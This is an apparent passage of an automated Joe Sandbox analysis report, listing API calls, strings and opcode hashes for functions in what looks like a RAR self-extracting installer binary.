                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                              • Opcode ID: 03faee5455a41d0970fd0e63024c1e613f6af730e0fa59899db6ed1bb8cc88bc
                                                                                                                                                                                                              • Instruction ID: 2db11bc5f8ca98cdf3d181c75b814597b2c54f18a69c8c63fb0af491f5866d29
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03faee5455a41d0970fd0e63024c1e613f6af730e0fa59899db6ed1bb8cc88bc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1F0F840F1D687C6FE547BB199412F5E2809F8C7A0F8C4730DE2E862CADE6CAC818538
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 680105476-0
                                                                                                                                                                                                              • Opcode ID: 4dfc08cdeeb08750f013b755c6ed595e0fed9c9534be3c03a2b3033aab705a33
                                                                                                                                                                                                              • Instruction ID: e3cb7e7c6f69ca69652e97217aa69e2fefa56bb896334a82337c3a356bcc4c1d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4dfc08cdeeb08750f013b755c6ed595e0fed9c9534be3c03a2b3033aab705a33
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56E0EC50E9D187C3F95832B218161F981404F19370EDC1B30DD3D082C3AD1DEC56823E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 749574446-0
                                                                                                                                                                                                              • Opcode ID: 11b1f2b1018e56caa8821faeaad5060e4c750f80eb2c4ba6fef7761e7ec45562
                                                                                                                                                                                                              • Instruction ID: a6f95966d5b5fe76f9e7c8987cee1bd6868810fe73275704e7971f5696652660
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11b1f2b1018e56caa8821faeaad5060e4c750f80eb2c4ba6fef7761e7ec45562
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82E08C56B20596C2EB20BB7AC8516AA9322AF8DBC4F8C1030CE0C07761CE28D4818710
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __vcrt_uninitialize_ptd
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1180542099-0
                                                                                                                                                                                                              • Opcode ID: 2a68aa68cf5e032bdbfc7122639fa2b42e0c491799a00a6c7e79bf908a7bab57
                                                                                                                                                                                                              • Instruction ID: aac0d546401c2a5c869b178dbff9221e6802c122a32976125eb82448481a0581
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a68aa68cf5e032bdbfc7122639fa2b42e0c491799a00a6c7e79bf908a7bab57
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08E0B660E0E2C3D6E9987B3288420F9A2502F25314FDC1A75E01E821E2ED2E69065A3A
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ItemMessageSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3015471070-0
                                                                                                                                                                                                              • Opcode ID: f1b4ed78b98df09309aff98c44a847ef4ec68267f435a55d52b31d39372f1c85
                                                                                                                                                                                                              • Instruction ID: c4a32bf484b086da80431acc418baa3ad6ef80a9e570a4f6ec067491a9faefef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1b4ed78b98df09309aff98c44a847ef4ec68267f435a55d52b31d39372f1c85
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20D0A794F096C5C2F720B711A4153F983507F55B80F940234D94D0E791CE6CD1274B50
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileType
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3081899298-0
                                                                                                                                                                                                              • Opcode ID: c39f4476cc59087d02f7cb1bea003a4bc2482edead308a9328c245ec26982a56
                                                                                                                                                                                                              • Instruction ID: 730409591996bfcc700ddc39bfed661b2195a30e41afea82bfd136c6260711df
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c39f4476cc59087d02f7cb1bea003a4bc2482edead308a9328c245ec26982a56
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FCD0C912D09481C2D9106779D9511BDA354BF42735FE90720D23EC26E1CE1DA4969220
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1611563598-0
                                                                                                                                                                                                              • Opcode ID: 5338a235c8d50967549d23fbf21572ed64d44ed7639b9633c157d133c87d5f2d
                                                                                                                                                                                                              • Instruction ID: ab594375e5c31017114bfed3cb7c18d1c2cc50e09ab3d7735b8036c68488e38e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5338a235c8d50967549d23fbf21572ed64d44ed7639b9633c157d133c87d5f2d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7A01100F02882C2AA083B338C8A20A82283B88B00FC88020C00880220CE0C80AA0B20
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Item$DialogMessageSendText
                                                                                                                                                                                                              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                                                                                              • API String ID: 910434759-1840816070
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • wcscpy.LIBCMT ref: 00007FF75FB97C12
                                                                                                                                                                                                              • CreateFileW.KERNEL32 ref: 00007FF75FB97CDF
                                                                                                                                                                                                                • Part of subcall function 00007FF75FB98818: GetCurrentProcess.KERNEL32 ref: 00007FF75FB9882C
                                                                                                                                                                                                                • Part of subcall function 00007FF75FB98818: GetLastError.KERNEL32 ref: 00007FF75FB9888D
                                                                                                                                                                                                                • Part of subcall function 00007FF75FB98818: CloseHandle.KERNEL32 ref: 00007FF75FB988A0
                                                                                                                                                                                                                • Part of subcall function 00007FF75FB9B34C: DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,00007FF75FB9A5D6), ref: 00007FF75FB9B362
                                                                                                                                                                                                                • Part of subcall function 00007FF75FB9B34C: DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00007FF75FB9A5D6), ref: 00007FF75FB9B38D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Delete$CloseCreateCurrentErrorHandleLastProcesswcscpy
                                                                                                                                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                                                              • API String ID: 344333846-3508440684
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                                                                                                                                              • String ID: PNG
                                                                                                                                                                                                              • API String ID: 541704414-364855578
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF75FBC0694
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBBDD68: GetCurrentProcess.KERNEL32(00007FF75FBC189D), ref: 00007FF75FBBDD95
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                                                              • String ID: *?$.
                                                                                                                                                                                                              • API String ID: 2518042432-3972193922
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FormatInfoLocaleNumber
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2169056816-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3479602957-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wcscat$AllocByteCharGlobalMultiWidewcscpy
                                                                                                                                                                                                              • String ID: $</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                                                                                              • API String ID: 2461171529-1507786326
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                              • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                                                                              • API String ID: 3215553584-2617248754
                                                                                                                                                                                                              • Opcode ID: d0f6e0e755be6f81d642f5a4928110be519ccee4392f6ac5a24fef1ade4e8050
                                                                                                                                                                                                              • Instruction ID: b061dbbcbda168db849d58ac0d7f53cf08994758f2c7d629b4bab70c8f833523
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0f6e0e755be6f81d642f5a4928110be519ccee4392f6ac5a24fef1ade4e8050
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A41BB72A09B85C9E700EF75E8417EE73A4EB18798F884136EE8C07B94DE3CD4258354
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
• Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Item$Text
                                                                                                                                                                                                              • String ID: LICENSEDLG
                                                                                                                                                                                                              • API String ID: 1601838975-2177901306
                                                                                                                                                                                                              • Opcode ID: e0e813d694038819732ec324e5558a444dad7dee1083978382a202e348cc525b
                                                                                                                                                                                                              • Instruction ID: e0bd36761f4e49af6fd39c3671e0b8bb8720279219ac1b62da544898000242d3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e0e813d694038819732ec324e5558a444dad7dee1083978382a202e348cc525b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF417D65A09692C2FB58BB22E8543F8A3A5AF89FC4F8C4035DD4D07B95CF3CE5428324
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ButtonCheckedObject$ClassDeleteLongName
                                                                                                                                                                                                              • String ID: STATIC
                                                                                                                                                                                                              • API String ID: 781704138-1882779555
                                                                                                                                                                                                              • Opcode ID: dc86dc3c53170f4d5698ad76ced0c7edefbbafb42d4d4dd989580a58c0d7cc96
                                                                                                                                                                                                              • Instruction ID: 887d1c9fd0e027d15a15687b5832d57ddd6a52a46979c24a4911144b7b3b20c4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc86dc3c53170f4d5698ad76ced0c7edefbbafb42d4d4dd989580a58c0d7cc96
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2319265B0978287EB10BB22A5586FDE395EB89BC0F984030DD8D47B55DE3DE8428760
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ShowWindow$CloseCodeExitHandleProcess
                                                                                                                                                                                                              • String ID: .exe$.inf$Install$p
                                                                                                                                                                                                              • API String ID: 235082525-3607691742
                                                                                                                                                                                                              • Opcode ID: adc50215b8679669ca15db43a899b88b24b5617d1cab28a4d91fed0c8054fb67
                                                                                                                                                                                                              • Instruction ID: 85c8b475df385cb8bd2345b603e76796b3064921c32f1167896a81492c6c7acd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: adc50215b8679669ca15db43a899b88b24b5617d1cab28a4d91fed0c8054fb67
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90715E61B09683D6EB64AB31E8502F9B3A4EF84784FDC4135DA4E436A4DF3DE941C724
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                                                                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                                                              • API String ID: 2915667086-2207617598
                                                                                                                                                                                                              • Opcode ID: 67976fa20c078f1fa4cd085f8d12fa31ca02224fdc21a952c759dedfb78ddc85
                                                                                                                                                                                                              • Instruction ID: 2e5f1ad3650f436a995d3811cfa00c2ecc5b4acc92d03c3139d67898cc35ba2c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67976fa20c078f1fa4cd085f8d12fa31ca02224fdc21a952c759dedfb78ddc85
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F310B20E0AB87C4EA15AB35AC402B6B7A0BF58B90F9C5139C99D077A5EE3CE545C324
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: swprintf
                                                                                                                                                                                                              • String ID: ;%u$x%u$xc%u
                                                                                                                                                                                                              • API String ID: 233258989-2277559157
                                                                                                                                                                                                              • Opcode ID: a63eb6064becaf551ee9b62623661f26d4beeaa20fe838dd2f8d40139cf0e1d3
                                                                                                                                                                                                              • Instruction ID: ed2ff73ce9a4c4daa9017449e0b0bd42d7426a4b2c22d527a4271dc56d7f56c0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a63eb6064becaf551ee9b62623661f26d4beeaa20fe838dd2f8d40139cf0e1d3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1802AD22F0C2C2C1FE28BA3297563FEE791AF55780F884035DA8E47686DE6DE545C321
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                              • API String ID: 2940173790-393685449
                                                                                                                                                                                                              • Opcode ID: 656fa11f87a5835f4a8d5b9d8c1c214d7a371b9261438cca58653dffd1aead5d
                                                                                                                                                                                                              • Instruction ID: 98400aeb651413d0bcbabd3cf21fb3c9530031d68d0482d6b685fc98f942d282
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 656fa11f87a5835f4a8d5b9d8c1c214d7a371b9261438cca58653dffd1aead5d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9E1A072A086C2CBE721AF35D8842EDB7A1FB45748F980136DA8D47699CF38E981C715
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileMoveNamePath$CompareLongShortStringswprintf
                                                                                                                                                                                                              • String ID: rtmp%d
                                                                                                                                                                                                              • API String ID: 2308737092-3303766350
                                                                                                                                                                                                              • Opcode ID: 8ddca6d37f97333df73e724e0fd53a187de6789ea24f91e5f34e9e4509da98fe
                                                                                                                                                                                                              • Instruction ID: afde2b81f15f34b9241b6c39ce3e576dff1bffe20dc54ef6d17cdaf8fe330c86
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ddca6d37f97333df73e724e0fd53a187de6789ea24f91e5f34e9e4509da98fe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC515A62B185C2D5EA30BB31D9451FEA3A8BF85BC4FC94031D94D5BA9ADE3CE605C360
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Show$ItemRectText
                                                                                                                                                                                                              • String ID: RarHtmlClassName
                                                                                                                                                                                                              • API String ID: 2921387401-1658105358
                                                                                                                                                                                                              • Opcode ID: 2c71e3d9204bf68c8187079716c1d8d07857564370bdb57e2ca0224828b4a0b7
                                                                                                                                                                                                              • Instruction ID: f2d214164bdddb78a4e2cf91122d69320f9d2f873f4962e5b2eb8ade2c243e02
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c71e3d9204bf68c8187079716c1d8d07857564370bdb57e2ca0224828b4a0b7
